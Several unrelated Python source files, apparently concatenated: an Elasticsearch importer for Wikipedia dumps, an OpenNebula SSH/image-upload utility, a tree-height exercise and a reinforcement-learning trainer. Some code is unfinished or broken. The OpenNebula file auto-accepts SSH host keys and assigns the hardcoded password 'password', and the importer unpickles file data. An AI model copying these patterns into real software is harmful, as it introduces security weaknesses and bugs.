# TICKER_PATTERN = TICKER_ALIAS + '-*'
class WikiRedirect(Document):
title = Keyword(required=True) # as doc._id for quick search
redirect = Keyword() # redirect to wiki title
redirect_wkid = Keyword() # redirect to wiki id
dbpedia_id = Keyword()
class Index:
name = REDIRECT_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0
}
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.title
return super().save(**kwargs)
class WikiPage(Document):
wkid = Keyword(required=True) # wiki page id, use as doc._id
mentions = Keyword(multi=True, index=False) # json string
# fields from cirrussearch
template = Keyword(multi=True)
content_model = Keyword()
# opening_text
wiki = Keyword()
# auxiliary_text
language = Keyword()
title = Keyword()
text = Text(index=False) # escaped
# defaultsort
# timestamp
redirect = Text(index=False) # json string
wikibase_item = Keyword()
# version_type
# heading
source_text = Text(index=False)
# coordinates
# version
# external_link
# namespace_text
namespace = Integer()
# text_bytes
# incoming_links
category = Keyword(multi=True)
outgoing_link = Keyword(multi=True)
popularity_score = Float()
# create_timestamp
# ores_articletopics
class Index:
name = PAGE_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0, }
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.wkid
return super().save(**kwargs)
# @classmethod
# def match(cls, title: str, min_score: int = 10):
# s = cls.search()
# s = s.query("match", title=title)
# for hit in s.execute()[:1]:
# if hit.meta.score > min_score:
# return hit
# return None
class WikiData(Document):
en_title = Keyword(required=True) # en wiki title, use as doc._id
wkd_id = Keyword(required=True) # wiki data id
json = Text(index=False)
class Index:
name = WKD_ALIAS
settings = {
'number_of_shards': 1,
'number_of_replicas': 0, }
def save(self, **kwargs):
if 'id' not in self.meta:
self.meta.id = self.en_title
return super().save(**kwargs)
def search_wikipage(title: str, min_score: int = 10):
s = WikiRedirect.search()
s = s.query("match", title=title)
for hit in s.execute()[:1]:
if hit.meta.score > min_score:
return hit
return None
def get_wikipage(title: str) -> Optional[WikiPage]:
try:
redirect = WikiRedirect.get(id=title)
return WikiPage.get(id=redirect.redirect_wkid)
except elasticsearch.NotFoundError:
redirect = search_wikipage(title)
if redirect is None:
return
else:
return WikiPage.get(id=redirect.redirect_wkid)
def get_corresponded_wktitles(cat_title: str) -> List[str]:
"""給wiki category title,找到該category的主要page titles"""
excluded = set(["Help:Categories"])
excluded_sub = ("Category:", "Wikipedia:", "Template:", "CAT:")
page = get_wikipage(title=cat_title)
if page is None:
return []
# try:
titles = set(page.outgoing_link) - excluded
titles = filter(lambda e: not any(
f in e for f in excluded_sub), titles)
titles = [t.replace("_", " ") for t in titles]
return titles
# except:
# return []
# ---------------
# Utilities
# ---------------
class ThreadsafeIter:
"""https://gist.github.com/platdrag/e755f3947552804c42633a99ffd325d4"""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
return self.it.__next__()
def threadsafe_generator(f):
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
def _parse_mentions(text: str) -> List[Tuple[str, str]]:
    """
    Return: list of tuples, e.g. [("wiki title", "mentioned text"), ...]
    """
# parsed = wtp.parse(text)
# mentions = [(k.title, k.text or k.title) for k in parsed.wikilinks]
wikicode = mwparserfromhell.parse(text)
links = wikicode.filter_wikilinks()
mentions = []
for k in links:
title = k.title.strip_code()
text = title if k.text is None else k.text.strip_code()
mentions.append((title, text))
return mentions
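# Illustrative sketch (not part of the import pipeline): what _parse_mentions()
# extracts from raw wikitext. The sample markup below is made up.
def _demo_parse_mentions():
    sample = "[[Python (programming language)|Python]] is popular; see [[NumPy]]."
    assert _parse_mentions(sample) == [
        ("Python (programming language)", "Python"),
        ("NumPy", "NumPy"),
    ]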
def import_from_cirrusdump(dump_path: str, n_threads: int, skip: int = 0, first_n: int = None) -> None:
def convert_title(title: str, namespace: int) -> str:
return f"Category:{title}" if namespace == 14 else title
def processor(ln1: str, ln2: str) -> None:
j1 = json.loads(ln1)
j2 = json.loads(ln2)
if j2["namespace"] not in (0, 14):
return
wkid = j1["index"]["_id"]
title = convert_title(j2["title"], j2["namespace"])
popularity_score = j2["popularity_score"] if "popularity_score" in j2 else None
wikibase_item = j2["wikibase_item"] if "wikibase_item" in j2 else None
for r in j2["redirect"]:
if r["namespace"] not in (0, 14):
return
doc = WikiRedirect(
title=convert_title(r["title"], r["namespace"]),
redirect=title,
redirect_wkid=wkid)
doc.save()
# allow self-redirect
doc = WikiRedirect(
title=title,
redirect=title,
redirect_wkid=wkid)
doc.save()
doc = WikiPage(
title=title,
wkid=wkid,
mentions=json.dumps(
_parse_mentions(j2["source_text"]),
ensure_ascii=False),
template=j2["template"],
content_model=j2["content_model"],
wiki=j2["wiki"],
language=j2["language"],
text=j2["text"],
redirect=json.dumps(j2["redirect"], ensure_ascii=False),
wikibase_item=wikibase_item,
# source_text=j2["source_text"],
namespace=j2["namespace"],
category=j2["category"],
outgoing_link=j2["outgoing_link"],
popularity_score=popularity_score,)
doc.save()
@threadsafe_generator
def readline():
with gzip.open(dump_path, 'r') as f:
for i, ln1 in enumerate(f):
if first_n is not None and i > first_n:
print(f"Early stop: {first_n}")
break
if i < skip:
continue
if i % 10000 == 0:
print(i)
ln2 = next(f)
yield ln1, ln2
readline = readline()
q = queue.Queue()
def worker():
while True:
try:
ln1, ln2 = q.get()
processor(ln1, ln2)
except Exception as e:
# print(ln2.decode())
print(e)
# break
# print(meta, doc)
try:
q.put(next(readline))
except StopIteration:
pass
finally:
q.task_done()
for _ in range(n_threads):
threading.Thread(target=worker, daemon=True).start()
for _ in range(n_threads * 3):
q.put(next(readline))
q.join()
print('All work completed')
def import_from_wkddump(dump_path: str, skip: int = 0, first_n: int = None) -> None:
for i, entity_dict in enumerate(WikidataJsonDump(dump_path)):
if first_n is not None and i > first_n:
print(f"Early stop at {first_n}")
break
if i < skip:
continue
if i % 10000 == 0:
print(i)
if entity_dict["type"] == "item":
e = WikidataItem(entity_dict)
doc = WikiData(
en_title=e.get_enwiki_title(),
wkd_id=e.entity_id,
json=json.dumps(e._entity_dict),)
doc.save()
def import_from_wikiextracted(path_to_wikiextracted_folder: str):
print("Wikiextracted to elastic start")
for p in glob.glob(f'{path_to_wikiextracted_folder}/**/*'):
print(p)
with open(p) as f:
for ln in f.readlines():
j = json.loads(ln)
charoffsets_mentions = pickle.loads(
base64.b64decode(j['internal_links'].encode('utf-8')))
mentions = [
(char_start, char_end, mention, wiki_page_name)
for ((char_start, char_end), (mention, wiki_page_name)) in charoffsets_mentions.items()
]
p = WikiPage(
title=html.unescape(j["title"]),
uid=j["id"],
url=j["url"],
text=j["text"],
mentions=json.dumps(mentions, ensure_ascii=False))
p.save()
print("Wikiextracted to elastic finished")
def wkredirects_to_elastic(path_to_dbpedia_folds: str):
require_files = (
"page_ids_en.ttl.bz2",
"redirects_lang=en.ttl.bz2",
)
def scan_ttl(path: str, proc_one: callable):
with bz2.BZ2File(path, "rb") as f:
for i, l in enumerate(f):
if i % 10000 == 0:
print(i)
# if i > 10:
# break
ln = l.decode().strip()
if ln.startswith("#"):
continue
s, p, o, _ = ln.split(" ")
proc_one(s, p, o)
# title, redirect = pattern.findall(ln)[0]
# title = html.unescape(title)
# redirect = html.unescape(redirect)
# add dpid
def _proc(s, p, o):
u = UpdateByQuery(index='wiki-page').using(es)
# u = u.query("term", uid="21550")
u = u.query("term", uid=o)
u = u.script(
source="ctx._source.dpid=params.dpid",
params={"dpid": s},)
resp = u.execute()
    # NOTE: `path` is not defined in this scope; it presumably should be one of
    # the files in `require_files`, joined with path_to_dbpedia_folds.
    scan_ttl(path, _proc)
    # add redirect
    # NOTE: this second _proc is currently an exact copy of the dpid update
    # above and still needs to be adapted to write the redirect field.
    def _proc(s, p, o):
u = UpdateByQuery(index='wiki-page').using(es)
# u = u.query("term", uid="21550")
u = u.query("term", uid=o)
u = u.script(
source="ctx._source.dpid=params.dpid",
params={"dpid": s},)
resp = u.execute()
    scan_ttl(path, _proc)  # `path` is undefined here as well
    # NOTE: unfinished draft; `redirect` and `title` below are never assigned in
    # this scope -- see the working wkredirects_to_elastic() defined further down.
    def proc_uid(ln: str):
s, p, o, _ = ln.split(" ")
try:
_ = WikiPage.get(redirect)
except:
pass
try:
_ = WikiPage.get(redirect)
except elasticsearch.NotFoundError:
# print(f"Redirect page not found: {redirect}")
pass
try:
p = WikiPage.get(title)
except elasticsearch.NotFoundError:
p = WikiPage(title=title, redirect=redirect)
p.save()
else:
if p.title != redirect:
p.update(redirect=redirect)
def wkredirects_to_elastic(path_to_redirects_file: str):
print("Wiki-redirects to elastic start")
pattern = re.compile(
"<http://dbpedia.org/resource/(.*)> <http://dbpedia.org/ontology/wikiPageRedirects> <http://dbpedia.org/resource/(.*)> .")
with bz2.BZ2File(path_to_redirects_file, "rb") as f:
for i, l in enumerate(f):
if i % 10000 == 0:
print(i)
# if i > 10:
# break
ln = l.decode().strip()
if ln.startswith("#"):
continue
# try:
# title, redirect = pattern.findall(ln)[0]
# except Exception as e:
# print(e)
# print(ln)
title, redirect = pattern.findall(ln)[0]
title = html.unescape(title)
redirect = html.unescape(redirect)
try:
_ = WikiPage.get(redirect)
except elasticsearch.NotFoundError:
# print(f"Redirect page not found: {redirect}")
continue
try:
p = WikiPage.get(title)
except elasticsearch.NotFoundError:
p = WikiPage(title=title, redirect=redirect)
p.save()
else:
if p.title != redirect:
p.update(redirect=redirect)
print("Wiki-redirects to elastic finished")
def scan_scraper_page(url_filter: str, sorted: bool = False) -> Iterable[Document]:
es = connections.get_connection()
s = Search(using=es, index="scraper-page")
q = Q('wildcard', resolved_url=url_filter) & Q("term", http_status=200)
s = s.query(q)
if sorted:
s = s.sort('article_published_at')
s = s.params(preserve_order=True)
# resp = s.scan()
# print(resp.hits.total)
visited = set()
for i, hit in enumerate(s.scan()):
# if i > 100:
# break
if hit.resolved_url in visited:
continue
visited.add(hit.resolved_url)
yield hit
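# Usage sketch (the URL pattern below is hypothetical):
#
#   for hit in scan_scraper_page("*example.com*", sorted=True):
#       print(hit.resolved_url, hit.article_published_at)
#
# Only documents with http_status == 200 are yielded, sorted by publication date
# when sorted=True, and duplicate resolved_url values are skipped.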
# ---------------
# Setup functions
# ---------------
def create_patterned_index(alias: str, pattern: str, create_alias: bool = True) -> None:
"""Run only one time to setup"""
name = pattern.replace(
'*', datetime.datetime.now().strftime('%Y%m%d%H%M'))
# create_index
es = connections.get_connection()
es.indices.create(index=name)
if create_alias:
es.indices.update_aliases(body={
'actions': [
{"remove": {"alias": alias, "index": pattern}},
{"add": {"alias": alias, "index": name}},
]
})
def migrate(src, dest):
es = connections.get_connection()
es.reindex(body={"source": {"index": src}, "dest": {"index": dest}})
es.indices.refresh(index=dest)
def connect(hosts: List[str]):
# c = connections.Connections()
# c.configure(default={"hosts": ["es.com"]}, local={"hosts": ["localhost"]})
# c.remove_connection("default")
connections.create_connection(hosts=hosts, timeout=20)
if __name__ == '__main__':
connect(['es:9200'])
# create_patterned_index(PAGE_ALIAS, PAGE_PATTERN)
# create_patterned_index(REDIRECT_ALIAS, REDIRECT_PATTERN)
# create_patterned_index(WKD_ALIAS, WKD_PATTERN)
# Import cirrusdump: require both content & general dump
# import_from_cirrusdump(
# "/workspace/entity_knowledge_in_bert/app/downloads/cirrus/enwiki-20200907-cirrussearch-content.json.gz",
# n_threads=20,
# first_n=100000,)
import_from_wkddump(
"/workspace/entity_knowledge_in_bert/app/downloads/latest-all.json.bz2",
first_n=10000,
)
# Deprecated
# wikiextracted_to_elastic("./downloads/wikiextracted")
# wkredirects_to_elastic("../downloads/redirects_lang=en.ttl.bz2")
|
opennebula_util.py
|
"""
Copyright 2019 Atos
Contact: Javier Melián <javimelian@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pyone
import functools
from multiprocessing import Process
import logging
#File transfer imports
from paramiko import SSHClient, AutoAddPolicy
from scp import SCPClient
# Logging Parameters
logger = logging.getLogger("ONE")
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
stream_formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
fh = logging.FileHandler('one.log')
fh.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(fh)
logger.addHandler(stream_handler)
def timeout(func):
"""
Wrapper for function, terminate after 5 seconds
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
action = Process(target=func, args=args, kwargs=kwargs)
action.start()
action.join(timeout=5)
if action.is_alive():
# terminate function
action.terminate()
# clean up
action.join()
            raise TimeoutError
        # if the exit code is not 0, the call was not successful
        if action.exitcode != 0:
            # raise AttributeError, which is the most probable cause
            raise AttributeError
    return wrapper
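# Usage sketch for the decorator above (the function name is hypothetical):
#
#   @timeout
#   def allocate_vm(conn, template):
#       ...  # potentially slow pyone call
#
# The wrapped call runs in a separate process: it raises TimeoutError after
# 5 seconds, or AttributeError if the child process exits with a non-zero code.
# Note that any return value is lost, since the work happens in a child process.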
def ssh_transfer_files(ssh_host, ssh_user, ssh_password, source_volume, destination_volume, ssh_port=22):
import plumbum
import os.path
from os import path
try:
logger.debug("Source image file exists: "+str(path.exists(source_volume)))
remote = plumbum.SshMachine(str(ssh_host), user = ssh_user, password = ssh_password)
fro = plumbum.local.path(source_volume)
to = remote.path(destination_volume)
plumbum.path.utils.copy(fro, to)
logger.info("File transfered")
except Exception as e:
logger.exception("Failure while transfering the file to the server: {}".format(str(e)))
#remote.close()
def ssh_scp_files(ssh_host, ssh_user, ssh_password, source_volume, destination_volume, ssh_port=22):
"""
"""
import os
logger.info("Transfering file {} to the server".format(source_volume))
try:
ssh = SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(ssh_host, username=ssh_user, password=ssh_password, look_for_keys=False)
with SCPClient(ssh.get_transport()) as scp:
scp.put(source_volume, recursive=True, remote_path=destination_volume)
logger.info("File transfered")
#once transfered, convert the image from raw to qcow2
# Example: qemu-img convert -f raw -O qcow2 ttylinux-vd.qcow2 ttylinux-vd.qcow2
command = "qemu-img convert -f raw -O qcow2 {}{} {}{}".format(destination_volume, source_volume, destination_volume, os.path.splitext(source_volume)[0]+'.qcow2')
stdin, stdout, stderr = ssh.exec_command(command)
logger.info("File converted to qcow2 format")
except Exception as e:
logger.exception("Failure while transfering the file to the server: {}".format(str(e)))
ssh.close()
def delete_remote_file(ssh_host, ssh_user, ssh_password, path, ssh_port=22):
"""
"""
logger.info("Deleting cached file")
try:
ssh = SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(ssh_host, username=ssh_user, password=ssh_password, look_for_keys=False)
sftp = ssh.open_sftp()
logger.debug("path: {}".format(path))
sftp.remove(path)
logger.info("File deleted")
    except Exception as e:
        logger.exception("Failure while deleting cached file: {}".format(str(e)))
        return "Failure while deleting cached file: {}".format(str(e)), 400
    finally:
        # close the connection on both the success and the error paths
        ssh.close()
    return "OK", 204
class Opennebula():
"""
Class implementing the communication API with OpenNebula
"""
# Note: Cannot use conn as a self variable, as it is not possible to
# serialize it and store it in a db
def __init__(self, uuid, auth_url, project_name, username, password):
"""
Initialize an object of the class
"""
self.uuid = uuid
self.auth_url = auth_url
self.project_name = project_name
self.username = username
self.password = password
        # NOTE: this connection is created but never stored or used; per the
        # note above, it cannot be kept on self because it is not serializable.
        conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(username, password)
)
def create_project(self, conn, name, description=""):
"""
Creates a new OpenNebula group
"""
group = conn.group.allocate(name, description)
# returns Project object
return group
def create_user(self, conn, name, password, group):
"""
        Creates a new OpenNebula user
"""
user = conn.user.allocate(name, password, "", [group])
return user
def create_sec_group(self, conn, name, project):
"""
Creates the security group to be assigned to the new tenant
"""
sec_group = conn.create_security_group(
name=name, description="Security Group",
project_id=project.id)
conn.create_security_group_rule(sec_group)
return sec_group
def delete_user(self, conn, user_id):
"""
Deletes the user
"""
try:
return conn.user.delete(user_id)
except pyone.OneNoExistsException as e:
logger.exception("Failed. Trying to delete user: doesn't exist - ", user_id)
except Exception as e:
logger.exception("Failed. Trying to delete user: ", user_id)
def delete_user_by_name(self, conn, name):
"""
Deletes the user
"""
userpool = conn.userpool.info(-1, -1, -1)
for user in userpool.USER:
if user.get_NAME() == name:
return conn.user.delete(user.get_ID())
def delete_project(self, conn, group_id):
"""
Deletes the group
"""
try:
return conn.group.delete(group_id)
except pyone.OneNoExistsException as e:
logger.exception("Failed. Trying to delete group: doesn't exist - ", group_id)
except Exception as e:
logger.exception("Failed. Trying to delete group: ", group_id)
def delete_project_by_name(self, conn, name):
"""
Deletes the group
"""
grouppool = conn.grouppool.info(-1, -1, -1)
for group in grouppool.GROUP:
if group.get_NAME() == name:
return conn.group.delete(group.get_ID())
def delete_proj_user(self, user_id):
"""
Deletes user and project
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
try:
user = conn.user.info(user_id)
group = user.get_GROUPS().ID[0]
# delete group
conn.group.delete(group)
# delete user
return conn.user.delete(user.get_ID())
except pyone.OneNoExistsException as e:
logger.exception("Failed. User trying to delete, doesn't exist: ", user_id)
except Exception as e:
logger.exception("Failed. User trying to delete, group doesn't exist: ", user_id)
def delete_proj_user_by_name(self, name):
"""
Deletes user and project
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
userpool = conn.userpool.info(-1,-1,-1)
for user in userpool.USER:
if user.get_NAME() == name:
group = user.get_GROUPS()[0]
# delete group
conn.group.delete(group)
# delete user
return conn.user.delete(user.get_ID())
logger.warning("Delete user ONE: user does not exist: ", name)
def create_slice_prerequisites(self, tenant_project_name,
tenant_project_description,
tenant_project_user,
tenant_project_password,
slice_uuid):
"""
Creates the tenant (project, user, security_group) on the specified vim
"""
conn = pyone.OneServer(
self.auth_url,
session="{0}:{1}".format(self.username, self.password)
)
# creates the project in OpenNebula
project = self.create_project(conn, tenant_project_name,
tenant_project_description)
# creates the user
user = self.create_user(conn, tenant_project_user, "password", project)
# creates the security group and rules
# sec_group = self.create_sec_group(conn, tenant_project_name, project)
sec_group = "dummy"
return {"sliceProjectName": project, "sliceUserName": user,
"secGroupName": sec_group}
def upload_image (auth_url, one_username, one_password, f, server_ip, server_username, server_password, image_dir, ssh_port=22, image_type = "OS"):
"""
Transfers the image file to the ONE server and registers it to the ONE
"""
import os
try:
ssh_scp_files(server_ip, server_username, server_password, f, image_dir, ssh_port)
#ssh_transfer_files(server_ip, server_username, server_password, f, image_dir, ssh_port)
        # size of the file in bytes
size = os.path.getsize(f)
# convert to MB
size = int(size/(1024*1024))
        # Register the image
conn = pyone.OneServer(
auth_url,
session="{0}:{1}".format(one_username, one_password)
)
name, file_extension = os.path.splitext(f)
description = f
source = image_dir + f
# find the default datastore
dsid = 0
datastores = conn.datastorepool.info()
for ds in datastores.DATASTORE:
if ds.NAME == "default":
dsid = ds.ID
break
# creation of the image template and registration
#template='''\nNAME="%s"\nPATH="%s"\nTYPE="%s"\nDESCRIPTION="%s"\nSIZE="%d"''' % \
template='''\nNAME="%s"\nPATH="%s"\nTYPE="%s"\nDRIVER="qcow2"\nDESCRIPTION="%s"\nSIZE="%d"''' % \
(name, source, image_type, description, size*3)
logger.debug("template: {}".format(template))
logger.debug("DSID: {}".format(dsid))
r = conn.image.allocate(template,dsid)
except Exception as e:
logger.exception("Failed uploading image: {}".format(str(e)))
delete_remote_file(server_ip, server_username, server_password, str(image_dir + f), ssh_port)
return "Failed uploading image: {}".format(str(e)), 400
delete_remote_file(server_ip, server_username, server_password, str(image_dir + f), ssh_port)
return "Image uploaded successfully", 201
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
def compute_height(self):
# Replace this code with a faster implementation
maxHeight = 0
for vertex in range(self.n):
height = 0
i = vertex
while i != -1:
height += 1
i = self.parent[i]
            maxHeight = max(maxHeight, height)
        return maxHeight
def main():
tree = TreeHeight()
tree.read()
print(tree.compute_height())
threading.Thread(target=main).start()
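# A minimal sketch of the faster implementation hinted at above: memoise the
# height of every visited vertex so each parent chain is walked only once,
# giving O(n) overall instead of O(n^2). Illustrative alternative only; it is
# not wired into main().
class TreeHeightFast(TreeHeight):
    def compute_height(self):
        heights = [0] * self.n  # heights[v] == 0 means "not computed yet"
        for vertex in range(self.n):
            if heights[vertex]:
                continue
            # climb until we hit a vertex with a known height (or the root)
            path = []
            i = vertex
            while i != -1 and not heights[i]:
                path.append(i)
                i = self.parent[i]
            base = heights[i] if i != -1 else 0
            # unwind the collected path, assigning heights on the way back down
            for node in reversed(path):
                base += 1
                heights[node] = base
        return max(heights) if heights else 0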
|
trainer.py
|
from collections import deque
import tensorflow as tf
import numpy as np
import copy
import time
import threading
class AgentInterface:
def act(self, state, reward, training):
raise NotImplementedError()
    def stop_episode(self, state, reward, training):
raise NotImplementedError()
class Trainer:
def __init__(self,
env,
agent,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None,
is_finished=None,
evaluator=None,
end_eval=None,
should_eval=lambda s, e: s % 10 ** 5 == 0):
self.env = env
self.final_step = final_step
self.init_states = deque(
np.zeros(
[state_window] + state_shape,
dtype=np.float32
).tolist(),
maxlen=state_window
)
self.agent = agent
self.training = training
self.render = render
self.debug = debug
self.before_action = before_action
self.after_action = after_action
self.end_episode = end_episode
self.is_finished = is_finished
self.evaluator = evaluator
self.end_eval = end_eval
self.should_eval = should_eval
# counters
self.global_step = 0
self.local_step = 0
self.episode = 0
self.sum_of_rewards = 0
self.pause = True
# for multithreading
self.resume_event = threading.Event()
self.resume_event.set()
def move_to_next(self, states, reward, done):
states = np.array(list(states))
# take next action
action = self.agent.act(
states,
reward,
self.training
)
state, reward, done, info = self.env.step(action)
# render environment
if self.render:
self.env.render()
return state, reward, done, info
def finish_episode(self, states, reward):
states = np.array(list(states))
self.agent.stop_episode(
states,
reward,
self.training
)
if self.debug:
self.print_info()
def start(self):
while True:
self.local_step = 0
self.sum_of_rewards = 0
reward = 0
done = False
state = self.env.reset()
states = copy.deepcopy(self.init_states)
while True:
# to stop trainer from outside
self.resume_event.wait()
states.append(state.tolist())
# episode reaches the end
if done:
self.episode += 1
self.end_episode_callback(
self.env.get_results()['rewards'],
self.global_step, self.episode)
self.finish_episode(states, reward)
break
self.before_action_callback(
states, self.global_step, self.local_step)
state, reward, done, info = self.move_to_next(
states, reward, done)
self.after_action_callback(
states, reward, self.global_step, self.local_step)
self.sum_of_rewards += reward
self.global_step += 1
self.local_step += 1
if self.evaluator is not None:
self.evaluate()
if self.is_training_finished():
return
def print_info(self):
print('step: {}, episode: {}, reward: {}'.format(
self.global_step,
self.episode,
self.env.get_results()['rewards']
))
def before_action_callback(self, states, global_step, local_step):
if self.before_action is not None:
self.before_action(
states,
global_step,
local_step
)
def after_action_callback(self, states, reward, global_step, local_step):
if self.after_action is not None:
self.after_action(
states,
reward,
global_step,
local_step
)
def end_episode_callback(self, reward, global_step, episode):
if self.end_episode is not None:
self.end_episode(
reward,
global_step,
episode
)
def is_training_finished(self):
if self.is_finished is not None:
return self.is_finished(self.global_step)
return self.global_step > self.final_step
def evaluate(self):
should_eval = self.should_eval(self.global_step, self.episode)
if should_eval:
print('evaluation starts')
agent = copy.copy(self.agent)
agent.stop_episode(copy.deepcopy(self.init_states), 0, False)
eval_rewards = self.evaluator.start(
agent, self.global_step, self.episode)
if self.end_eval is not None:
self.end_eval(self.global_step, self.episode, eval_rewards)
if self.debug:
msg = '[eval] step: {}, episode: {}, reward: {}'
print(msg.format(
self.global_step, self.episode, np.mean(eval_rewards)))
def stop(self):
self.resume_event.clear()
def resume(self):
self.resume_event.set()
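# Usage sketch (env and agent are hypothetical placeholders: env needs gym-style
# reset()/step()/render()/get_results(), agent implements AgentInterface):
#
#   trainer = Trainer(env=my_env, agent=my_agent,
#                     state_shape=[84, 84], state_window=4,
#                     final_step=10 ** 6, render=False)
#   trainer.start()   # blocks until final_step is reached
#
# stop()/resume() toggle an internal threading.Event, so another thread can
# pause and resume the training loop between steps.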
class BatchTrainer(Trainer):
def __init__(self,
env, # BatchEnvWrapper
agent,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None):
super().__init__(
env=env,
agent=agent,
state_shape=state_shape,
final_step=final_step,
state_window=state_window,
training=training,
render=render,
debug=debug,
before_action=before_action,
after_action=after_action,
end_episode=end_episode
)
# overwrite global_step
self.global_step = 0
# TODO: Remove this overwrite
def move_to_next(self, states, reward, done):
states = np.array(list(states))
# take next action
action = self.agent.act(
states,
reward,
done, # overwrite line this
self.training
)
state, reward, done, info = self.env.step(action)
# render environment
if self.render:
self.env.render()
return state, reward, done, info
# overwrite
def start(self):
while True:
# values for the number of n environment
n_envs = self.env.get_num_of_envs()
self.local_step = [0 for _ in range(n_envs)]
self.sum_of_rewards = [0 for _ in range(n_envs)]
rewards = [0 for _ in range(n_envs)]
dones = [False for _ in range(n_envs)]
states = self.env.reset()
queue_states = [copy.deepcopy(self.init_states) for _ in range(n_envs)]
while True:
for i, state in enumerate(states):
queue_states[i].append(state.tolist())
np_states = np.array(list(map(lambda s: list(s), queue_states)))
# episode reaches the end
if False not in dones:
self.finish_episode(np_states, rewards)
break
for i in range(n_envs):
self.before_action_callback(
states[i],
self.global_step,
self.local_step[i]
)
# backup episode status
prev_dones = dones
states, rewards, dones, infos = self.move_to_next(
np_states, rewards, prev_dones)
for i in range(n_envs):
self.after_action_callback(
states[i],
rewards[i],
self.global_step,
self.local_step[i]
)
# check ended episodes
for i in range(n_envs):
if not prev_dones[i] and dones[i]:
self.episode += 1
                        # callback at the end of an episode (via the guarded
                        # wrapper, matching Trainer.start)
                        self.end_episode_callback(
self.env.get_results()[i]['rewards'],
self.global_step,
self.episode
)
for i in range(n_envs):
self.sum_of_rewards[i] += rewards[i]
if not dones[i]:
self.global_step += 1
self.local_step[i] += 1
if self.is_training_finished():
return
# overwrite
def print_info(self):
for i in range(self.env.get_num_of_envs()):
print('step: {}, episode: {}, reward: {}'.format(
self.global_step,
self.episode + i + 1,
self.sum_of_rewards[i]
))
class AsyncTrainer:
def __init__(self,
envs,
agents,
state_shape=[84, 84],
final_step=1e7,
state_window=1,
training=True,
render=False,
debug=True,
before_action=None,
after_action=None,
end_episode=None,
n_threads=10,
evaluator=None,
end_eval=None,
should_eval=None):
# meta data shared by all threads
self.meta_data = {
'shared_step': 0,
'shared_episode': 0,
'last_eval_step': 0,
'last_eval_episode': 0
}
# inserted callbacks
def _before_action(state, global_step, local_step):
shared_step = self.meta_data['shared_step']
if before_action is not None:
before_action(state, shared_step, global_step, local_step)
def _after_action(state, reward, global_step, local_step):
self.meta_data['shared_step'] += 1
shared_step = self.meta_data['shared_step']
if after_action is not None:
after_action(state, reward, shared_step, global_step, local_step)
def _end_episode(i):
def func(reward, global_step, episode):
shared_step = self.meta_data['shared_step']
self.meta_data['shared_episode'] += 1
shared_episode = self.meta_data['shared_episode']
if debug:
msg = 'worker: {}, global_step: {}, local_step: {}, episode: {}, reward: {}'
print(msg.format(
i,
shared_step,
global_step,
shared_episode,
reward
))
if end_episode is not None:
end_episode(
reward,
shared_step,
global_step,
shared_episode,
episode
)
return func
def _end_eval(step, episode, rewards):
shared_step = self.meta_data['shared_step']
shared_episode = self.meta_data['shared_episode']
for trainer in self.trainers:
trainer.resume()
if debug:
msg = '[eval] step: {}, episode: {}, reward: {}'
print(msg.format(shared_step, shared_episode, np.mean(rewards)))
if end_eval is not None:
end_eval(shared_step, shared_episode, step, episode, rewards)
def _should_eval(step, episode):
shared_step = self.meta_data['shared_step']
shared_episode = self.meta_data['shared_episode']
last_eval_step = self.meta_data['last_eval_step']
last_eval_episode = self.meta_data['last_eval_episode']
if should_eval is not None:
is_eval = should_eval(
last_eval_step, last_eval_episode,
shared_step, shared_episode, step, episode)
if is_eval:
for trainer in self.trainers:
trainer.stop()
self.meta_data['last_eval_step'] = shared_step
self.meta_data['last_eval_episode'] = shared_episode
return is_eval
self.trainers = []
for i in range(n_threads):
env = envs[i]
agent = agents[i]
trainer = Trainer(
env=env,
agent=agent,
state_shape=state_shape,
final_step=final_step,
state_window=state_window,
training=training,
render=i == 0 and render,
debug=False,
before_action=_before_action,
after_action=_after_action,
end_episode=_end_episode(i),
is_finished=lambda s: self.meta_data['shared_step'] > final_step,
evaluator=evaluator if i == 0 else None,
should_eval=_should_eval if i == 0 else None,
end_eval=_end_eval if i == 0 else None
)
self.trainers.append(trainer)
def start(self):
sess = tf.get_default_session()
coord = tf.train.Coordinator()
# gym renderer is only available on the main thread
render_trainer = self.trainers.pop(0)
threads = []
for i in range(len(self.trainers)):
def run(index):
with sess.as_default():
self.trainers[index].start()
thread = threading.Thread(target=run, args=(i,))
thread.start()
threads.append(thread)
time.sleep(0.1)
render_trainer.start()
coord.join(threads)
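# Usage sketch (envs/agents are hypothetical lists with one instance per worker
# thread). A TF1-style default session must be active when start() is called,
# since each worker re-enters it via tf.get_default_session():
#
#   trainer = AsyncTrainer(envs=envs, agents=agents, n_threads=len(envs),
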